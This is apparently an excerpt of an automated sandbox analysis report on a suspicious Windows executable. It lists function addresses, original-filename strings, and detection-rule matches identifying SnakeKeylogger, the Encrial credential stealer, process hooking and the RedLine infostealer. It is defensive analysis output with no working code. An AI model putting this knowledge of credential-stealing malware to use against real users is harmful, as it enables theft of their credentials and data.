                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_08582DE20_2_08582DE2
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085896E60_2_085896E6
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085888980_2_08588898
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0858DE980_2_0858DE98
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0858F6900_2_0858F690
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085812900_2_08581290
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0858B3900_2_0858B390
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085832880_2_08583288
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0858CB880_2_0858CB88
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085888890_2_08588889
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085849800_2_08584980
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0858A0800_2_0858A080
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0858F6820_2_0858F682
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_08583BB80_2_08583BB8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_08589BB80_2_08589BB8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0858F1B90_2_0858F1B9
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085852B00_2_085852B0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085870B00_2_085870B0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0858C6B00_2_0858C6B0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085824B20_2_085824B2
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0858DEA80_2_0858DEA8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_08583BAA0_2_08583BAA
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_08589BAA0_2_08589BAA
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085812A00_2_085812A0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0858B3A00_2_0858B3A0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085852A00_2_085852A0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085870A10_2_085870A1
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B89400_2_085B8940
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B21C00_2_085B21C0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BD4400_2_085BD440
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B00400_2_085B0040
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BA2400_2_085BA240
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BBE600_2_085BBE60
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B8C600_2_085B8C60
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BF0600_2_085BF060
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B9C000_2_085B9C00
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BCE000_2_085BCE00
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B00060_2_085B0006
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B18300_2_085B1830
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B18210_2_085B1821
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BB8200_2_085BB820
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BEA200_2_085BEA20
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BE0C00_2_085BE0C0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BAEC00_2_085BAEC0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B1CF80_2_085B1CF8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B04F80_2_085B04F8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B1CEA0_2_085B1CEA
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BCAE00_2_085BCAE0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B98E00_2_085B98E0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B0E910_2_085B0E91
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BDA800_2_085BDA80
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BA8800_2_085BA880
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BF6A80_2_085BF6A8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BC4A00_2_085BC4A0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B92A00_2_085B92A0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B0EA00_2_085B0EA0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B13580_2_085B1358
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BED400_2_085BED40
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BBB400_2_085BBB40
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B13680_2_085B1368
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BA5600_2_085BA560
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BD7600_2_085BD760
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B05080_2_085B0508
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BB5000_2_085BB500
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BE7000_2_085BE700
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BED300_2_085BED30
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B9F200_2_085B9F20
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BD1200_2_085BD120
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B09D00_2_085B09D0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BF9C80_2_085BF9C8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B09C00_2_085B09C0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BC7C00_2_085BC7C0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B95C00_2_085B95C0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BB1E00_2_085BB1E0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BE3E00_2_085BE3E0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BF3880_2_085BF388
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BC1800_2_085BC180
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B8F800_2_085B8F80
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085B21B00_2_085B21B0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BABA00_2_085BABA0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085BDDA00_2_085BDDA0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F49780_2_085F4978
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F2DD80_2_085F2DD8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F20100_2_085F2010
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F42900_2_085F4290
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F26F80_2_085F26F8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F3BA80_2_085F3BA8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F34C00_2_085F34C0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F49670_2_085F4967
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F2DC80_2_085F2DC8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F00400_2_085F0040
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F200A0_2_085F200A
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F00060_2_085F0006
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F42800_2_085F4280
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F26E80_2_085F26E8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F3B980_2_085F3B98
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F1C900_2_085F1C90
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F1C8A0_2_085F1C8A
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F12B80_2_085F12B8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F12AA0_2_085F12AA
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_085F34B00_2_085F34B0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_08E53DA40_2_08E53DA4
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_08E55F000_2_08E55F00
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_08E56BD10_2_08E56BD1
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_08E5BB780_2_08E5BB78
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_08E54C780_2_08E54C78
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_08E51E640_2_08E51E64
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: String function: 0040E1D8 appears 44 times
                      Source: x8M2g1Xxhz.exe, 00000000.00000000.1350584585.0000000000426000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs x8M2g1Xxhz.exe
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3792566680.0000000000436000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs x8M2g1Xxhz.exe
                      Source: x8M2g1Xxhz.exe, 00000000.00000003.1364212507.0000000000994000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs x8M2g1Xxhz.exe
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs x8M2g1Xxhz.exe
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs x8M2g1Xxhz.exe
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3792306502.0000000000197000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs x8M2g1Xxhz.exe
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs x8M2g1Xxhz.exe
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs x8M2g1Xxhz.exe
                      Source: x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs x8M2g1Xxhz.exe
                      Source: x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs x8M2g1Xxhz.exe
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs x8M2g1Xxhz.exe
                      Source: x8M2g1Xxhz.exe, 00000000.00000003.1364351995.00000000009A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs x8M2g1Xxhz.exe
                      Source: x8M2g1Xxhz.exeBinary or memory string: OriginalFilenameAubriella.exe4 vs x8M2g1Xxhz.exe
                      Source: x8M2g1Xxhz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.x8M2g1Xxhz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
